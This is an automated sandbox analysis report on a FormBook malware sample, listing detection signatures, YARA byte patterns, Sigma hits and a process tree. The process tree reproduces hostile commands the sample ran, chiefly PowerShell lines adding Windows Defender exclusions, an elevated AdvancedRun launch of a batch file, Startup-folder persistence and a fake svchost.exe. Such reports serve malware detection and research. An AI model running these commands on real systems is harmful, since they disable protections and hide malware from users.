Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report RYhdmjjr94

Overview

General Information

Sample Name:RYhdmjjr94 (renamed file extension from none to exe)
Analysis ID:483549
MD5:44696d252000850d3ea71d9ae238aedc
SHA1:1fb61a1df500f9025641526cb4013d555b129a84
SHA256:1b39d6bf218028dfe7bc8254a3b1682804e9bf05b8298c708c318236f64ad986
Tags:AfiaWaveEnterprisesOyexeFormbooksigned
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AntiVM3
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell adding suspicious path to exclusion list
Sigma detected: System File Execution Location Anomaly
Maps a DLL or memory area into another process
Drops PE files to the startup folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Drops PE files with benign system names
Writes to foreign memory regions
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Sigma detected: Powershell Defender Exclusion
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Stores files to the Windows start menu directory
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Launches processes in debugging mode, may be used to hinder debugging
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Creates files inside the system directory
Found potential string decryption / allocating functions
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • RYhdmjjr94.exe (PID: 4328 cmdline: 'C:\Users\user\Desktop\RYhdmjjr94.exe' MD5: 44696D252000850D3EA71D9AE238AEDC)
    • AdvancedRun.exe (PID: 5136 cmdline: 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 3228 cmdline: 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /SpecialRun 4101d8 5136 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6260 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6392 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6512 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6688 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6832 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 36C95A71.exe (PID: 7004 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' MD5: 44696D252000850D3EA71D9AE238AEDC)
      • AdvancedRun.exe (PID: 3132 cmdline: 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • AdvancedRun.exe (PID: 6968 cmdline: 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /SpecialRun 4101d8 3132 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • powershell.exe (PID: 3016 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5052 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6824 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • powershell.exe (PID: 7104 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5752 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • aspnet_compiler.exe (PID: 6608 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • powershell.exe (PID: 7148 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1140 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3688 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • aspnet_compiler.exe (PID: 6548 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 6672 cmdline: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' MD5: 44696D252000850D3EA71D9AE238AEDC)
          • AdvancedRun.exe (PID: 7032 cmdline: 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
            • AdvancedRun.exe (PID: 4968 cmdline: 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /SpecialRun 4101d8 7032 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
          • powershell.exe (PID: 6564 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 5020 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 4752 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • WerFault.exe (PID: 6376 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2188 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4824 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6172 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6212 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6284 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6456 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6604 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7156 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5496 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • 36C95A71.exe (PID: 5628 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' MD5: 44696D252000850D3EA71D9AE238AEDC)
    • AdvancedRun.exe (PID: 4888 cmdline: 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 7060 cmdline: 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /SpecialRun 4101d8 4888 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 2564 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2072 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6244 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4908 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6560 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6468 cmdline: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' MD5: 44696D252000850D3EA71D9AE238AEDC)
    • AdvancedRun.exe (PID: 7052 cmdline: 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6368 cmdline: 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /SpecialRun 4101d8 7052 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 2424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4492 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5984 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6584 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • svchost.exe (PID: 6068 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 3000 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4328 -ip 4328 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6508 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 7004 -ip 7004 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 1008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2896 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0xa088:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xa302:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x368a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x36b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15e25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x42645:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15911:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x42131:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15f27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x42747:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1609f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x428bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xad1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x3753a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x14b8c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x413ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xba13:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x38233:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1bac7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x482e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1caca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18ba9:$sqlite3step: 68 34 1C 7B E1
    • 0x18cbc:$sqlite3step: 68 34 1C 7B E1
    • 0x453c9:$sqlite3step: 68 34 1C 7B E1
    • 0x454dc:$sqlite3step: 68 34 1C 7B E1
    • 0x18bd8:$sqlite3text: 68 38 2A 90 C5
    • 0x18cfd:$sqlite3text: 68 38 2A 90 C5
    • 0x453f8:$sqlite3text: 68 38 2A 90 C5
    • 0x4551d:$sqlite3text: 68 38 2A 90 C5
    • 0x18beb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18d13:$sqlite3blob: 68 53 D8 7F 8C
    • 0x4540b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x45533:$sqlite3blob: 68 53 D8 7F 8C
    00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x2685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x2171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x2787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x28ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x13ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x8327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x932a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 42 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.0.RYhdmjjr94.exe.373b3c0.23.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        0.0.RYhdmjjr94.exe.373b3c0.23.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0.0.RYhdmjjr94.exe.38fe890.10.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            0.0.RYhdmjjr94.exe.38fe890.10.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              0.0.RYhdmjjr94.exe.38fe890.26.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                Click to see the 31 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: System File Execution Location AnomalyShow sources
                Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\2FDD6624\svchost.exe, NewProcessName: C:\Users\Public\Documents\2FDD6624\svchost.exe, OriginalFileName: C:\Users\Public\Documents\2FDD6624\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' , ProcessId: 6672
                Sigma detected: Execution from Suspicious FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\2FDD6624\svchost.exe, NewProcessName: C:\Users\Public\Documents\2FDD6624\svchost.exe, OriginalFileName: C:\Users\Public\Documents\2FDD6624\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' , ProcessId: 6672
                Sigma detected: Suspicious Svchost ProcessShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\2FDD6624\svchost.exe, NewProcessName: C:\Users\Public\Documents\2FDD6624\svchost.exe, OriginalFileName: C:\Users\Public\Documents\2FDD6624\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' , ProcessId: 6672
                Sigma detected: Powershell Defender ExclusionShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\RYhdmjjr94.exe' , ParentImage: C:\Users\user\Desktop\RYhdmjjr94.exe, ParentProcessId: 4328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force, ProcessId: 6260
                Sigma detected: Conhost Parent Process ExecutionsShow sources
                Source: Process startedAuthor: omkar72: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6824, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6556
                Sigma detected: Non Interactive PowerShellShow sources
